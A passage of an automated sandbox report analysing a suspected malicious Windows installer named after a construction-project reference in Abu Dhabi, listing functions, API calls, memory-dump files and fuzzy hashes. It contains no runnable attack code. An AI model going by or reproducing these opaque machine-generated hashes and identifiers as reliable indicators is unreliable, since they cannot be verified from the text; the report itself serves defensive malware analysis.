                                                                                                                            • Part of subcall function 332B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 332B5702
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2652629310-0
                                                                                                                          • Opcode ID: e4e6662245dd9d8e747d4cf5bfde80f0e0161d952f92073708bd483634a3cd1c
                                                                                                                          • Instruction ID: c56a30cd2b2e20cdc5fc934a7702503c652531ca206daa7d7d33f5d0759166ce
                                                                                                                          • Opcode Fuzzy Hash: e4e6662245dd9d8e747d4cf5bfde80f0e0161d952f92073708bd483634a3cd1c
                                                                                                                          • Instruction Fuzzy Hash: 2A31D07AA0025AABDF158F64CC84DAF3BB5EB44395F144128FC08DB190E735C891DB90
                                                                                                                          Function 0040317D Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                                                                                            • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,?,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                                          • WriteFile.KERNEL32(0040BE90,?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,?,00000000,00000000,?,?), ref: 0040327F
                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,?,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Pointer$CountTickWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2146148272-0
                                                                                                                          • Opcode ID: dd796cccabb6a84ac49973fb4d75d79188a42d38f0e762117ceda5c208fcbf67
                                                                                                                          • Instruction ID: 5e1569cfb0b545446f3df2febc41285ecf4c3109a81fe664ff5153a665b75745
                                                                                                                          • Opcode Fuzzy Hash: dd796cccabb6a84ac49973fb4d75d79188a42d38f0e762117ceda5c208fcbf67
                                                                                                                          • Instruction Fuzzy Hash: D9418B72504205DFDB109F29EE84AA63BADF74431671441BFE605B22E1C7B96D418BAC
                                                                                                                          Function 00402331 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                                          • lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1356686001-0
                                                                                                                          • Opcode ID: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                                                                                          • Instruction ID: 66b2e8a9ee20b684f946803e70458d48747d67842d9f9fe70aa08e99181ad06b
                                                                                                                          • Opcode Fuzzy Hash: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                                                                                          • Instruction Fuzzy Hash: C3118EB1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D6B85D419A29
                                                                                                                          Function 004015B9 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(?,?,00424EF0,?,00405AF6,00424EF0,00424EF0,00436800,?,74DF2EE0,00405834,?,00436800,74DF2EE0,00434000), ref: 00405A90
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405A95
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405AAD
                                                                                                                          • CreateDirectoryW.KERNEL32(?,?,00000000,?,00000000,?), ref: 004015E3
                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015ED
                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,00000000,?,00000000,?), ref: 004015FD
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,?), ref: 00401630
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3751793516-0
                                                                                                                          • Opcode ID: 0b24a768457497bf3eab191a7c20dd9ef2dcf7a171cde3cdfafed4ce3bf00be3
                                                                                                                          • Instruction ID: c154c5cc2fdcc817133e571beca98f96870035068e51bbb493f84d6d7086355a
                                                                                                                          • Opcode Fuzzy Hash: 0b24a768457497bf3eab191a7c20dd9ef2dcf7a171cde3cdfafed4ce3bf00be3
                                                                                                                          • Instruction Fuzzy Hash: 6711C231A04100EBCF206FA0CD44AAE7AB0FF14369B34463BF981B62E1D33D49419A6E
                                                                                                                          Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                                          • GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                                            • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1404258612-0
                                                                                                                          • Opcode ID: d0aace0066db3accf962e5b6be056e4656163b19ba1ee418162f5e9f181ae1bd
                                                                                                                          • Instruction ID: be65c1d2588467b23a66eae505f80d4d78c913a93c6f7397512a76e1284fe209
                                                                                                                          • Opcode Fuzzy Hash: d0aace0066db3accf962e5b6be056e4656163b19ba1ee418162f5e9f181ae1bd
                                                                                                                          • Instruction Fuzzy Hash: 2E113A71A00109BFDB00DFA5C945DAEBBB9EF48344F20447AF501F62A1D7749E50DB69
                                                                                                                          Function 332B5CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,332B1D66,00000000,00000000,?,332B5C88,332B1D66,00000000,00000000,00000000,?,332B5E85,00000006,FlsSetValue), ref: 332B5D13
                                                                                                                          • GetLastError.KERNEL32(?,332B5C88,332B1D66,00000000,00000000,00000000,?,332B5E85,00000006,FlsSetValue,332BE190,FlsSetValue,00000000,00000364,?,332B5BC8), ref: 332B5D1F
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,332B5C88,332B1D66,00000000,00000000,00000000,?,332B5E85,00000006,FlsSetValue,332BE190,FlsSetValue,00000000), ref: 332B5D2D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3177248105-0
                                                                                                                          • Opcode ID: c4026f39c23d7eb5da34cad0a80a97aa83e1ed0aed2d00829c42b4f7c2783189
                                                                                                                          • Instruction ID: f5236bccc62c2c663e5a95784ffb3ba4308a598efc02a09441d40ca5336196ff
                                                                                                                          • Opcode Fuzzy Hash: c4026f39c23d7eb5da34cad0a80a97aa83e1ed0aed2d00829c42b4f7c2783189
                                                                                                                          • Instruction Fuzzy Hash: 0D01AC366153236FDB155E68DC4CA867BADAF057E1B244B20F915EB140D720D482CBD0
                                                                                                                          Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                            • Part of subcall function 00405234: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                                                                            • Part of subcall function 00405234: SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                            • Part of subcall function 00405703: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 0040572C
                                                                                                                            • Part of subcall function 00405703: CloseHandle.KERNEL32(?), ref: 00405739
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E80
                                                                                                                          • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401E95
                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3585118688-0
                                                                                                                          • Opcode ID: cbdbd45a228a051035c7fb8c87293943a325636ebea5dbdff42e394fbb309f67
                                                                                                                          • Instruction ID: a183927f8f084cdb8571cb7bd96d2202481db38f7d29b0955d5094ceef348c04
                                                                                                                          • Opcode Fuzzy Hash: cbdbd45a228a051035c7fb8c87293943a325636ebea5dbdff42e394fbb309f67
                                                                                                                          • Instruction Fuzzy Hash: EB116171900104EBCF109FA0CD459DF7AB5EB44359F20447BE501B61E1C3794A92DFAA
                                                                                                                          Function 332B16AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen
                                                                                                                          • String ID: : $Se.
                                                                                                                          • API String ID: 4218353326-4089948878
                                                                                                                          • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                          • Instruction ID: 67c272abc23e7f879b3cd324ba89bfea2c5b6e8fe064c9f0e853078dc3f33ceb
                                                                                                                          • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                          • Instruction Fuzzy Hash: 8C11C176D00349AFDB10CFA89880BDEFBFCAF19244F14405AE545E7212E6B06B8287A5
                                                                                                                          Function 332B1EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 332B2903
                                                                                                                            • Part of subcall function 332B35D2: RaiseException.KERNEL32(?,?,?,332B2925,00000000,00000000,00000000,?,?,?,?,?,332B2925,?,332C21B8), ref: 332B3632
                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 332B2920
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                          • String ID: Unknown exception
                                                                                                                          • API String ID: 3476068407-410509341
                                                                                                                          • Opcode ID: 4064fe12f9c3b4968f253a8191bc49f9e7a94b418815e748b58c940be3bdb0c0
                                                                                                                          • Instruction ID: 5b2fa50ca13b843d14f9b398fae9fe9e473be242a5bf754fdd7c3db329435d4e
                                                                                                                          • Opcode Fuzzy Hash: 4064fe12f9c3b4968f253a8191bc49f9e7a94b418815e748b58c940be3bdb0c0
                                                                                                                          • Instruction Fuzzy Hash: E4F0C278D0030D778F04AAA5EC44DAD777C9F006D0B908271EAA4D6891EFF1EAD6C6D0
                                                                                                                          Function 004051A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • IsWindowVisible.USER32(?), ref: 004051D7
                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405228
                                                                                                                            • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                          • Opcode ID: 095d3e8979228cc473652e7f56876996a988928912ea754460f36dcc48231124
                                                                                                                          • Instruction ID: 3506bd8619de0691e6240ff1aea28b3f5ea6f30d487ea60658fc819ef8ae1edd
                                                                                                                          • Opcode Fuzzy Hash: 095d3e8979228cc473652e7f56876996a988928912ea754460f36dcc48231124
                                                                                                                          • Instruction Fuzzy Hash: 02017171540609ABDF205F91ED80AAB3A25EBA4314F50403AFA007A1E1C77A9C929F6D
                                                                                                                          Function 00405C27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00405C45
                                                                                                                          • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C60
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                          • String ID: nsa
                                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                                          • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                                          • Instruction ID: 7ad1723431e3bc490b0335289974808f62bfc0c3cb5a7c029972da154e4cc245
                                                                                                                          • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                                          • Instruction Fuzzy Hash: B9F09676604308BBEB009F59DC45E9BB7A8EB91710F10803AEA00E7140E2B0AD548B54
                                                                                                                          Function 332B69F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetOEMCP.KERNEL32(00000000,?,?,332B6C7C,?), ref: 332B6A1E
                                                                                                                          • GetACP.KERNEL32(00000000,?,?,332B6C7C,?), ref: 332B6A35
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: |l+3
                                                                                                                          • API String ID: 0-2294312451
                                                                                                                          • Opcode ID: 13f968f5f78afecabecc0ff5b2d501e0d43b0b49abb69e337f6113e402f5d3bc
                                                                                                                          • Instruction ID: 9ff87454ea8a981aa6d1ba948444c5f55b9a410b9b5ba1a4394a426b7b9cd923
                                                                                                                          • Opcode Fuzzy Hash: 13f968f5f78afecabecc0ff5b2d501e0d43b0b49abb69e337f6113e402f5d3bc
                                                                                                                          • Instruction Fuzzy Hash: 3FF03C34900209CBEF00EF68C488BAC7BB4BF01375F188B54E5789A1D1EB7599868B41
                                                                                                                          Function 00405703 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 0040572C
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405739
                                                                                                                          Strings
                                                                                                                          • Error launching installer, xrefs: 00405716
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                          • String ID: Error launching installer
                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                          • Opcode ID: 89d61fbbff7ca59509715ff9813e48ed7354dff71edc3a11a34e7e31b27a8334
                                                                                                                          • Instruction ID: 68da1b5efeb229702bef63955ccdeefd44cba6198d5a5f20aa9a51b41b675f94
                                                                                                                          • Opcode Fuzzy Hash: 89d61fbbff7ca59509715ff9813e48ed7354dff71edc3a11a34e7e31b27a8334
                                                                                                                          • Instruction Fuzzy Hash: 59E0BFB4A0420ABFFB109F64EC49F7B766CE710704F808521BD15F2250D7B4AC108A79
                                                                                                                          Function 00406A16 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fbba942c1d572bf921735f4c6026e3062a5fb5b34c07d0b910559572d6fe18fe
                                                                                                                          • Instruction ID: 341b99abf03f2e1941eb6220a2ba2fa20bbc036e9949a5bf9c2c078605d2769f
                                                                                                                          • Opcode Fuzzy Hash: fbba942c1d572bf921735f4c6026e3062a5fb5b34c07d0b910559572d6fe18fe
                                                                                                                          • Instruction Fuzzy Hash: 9DA13471E00229DBDB28CFA8C8547ADBBB1FF48305F11816AD856BB281C7785A96CF44
                                                                                                                          Function 00406C17 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9b416045f54723c0aced5ed7493083a206bc2f8aaa63c3fa24b1832e5229f487
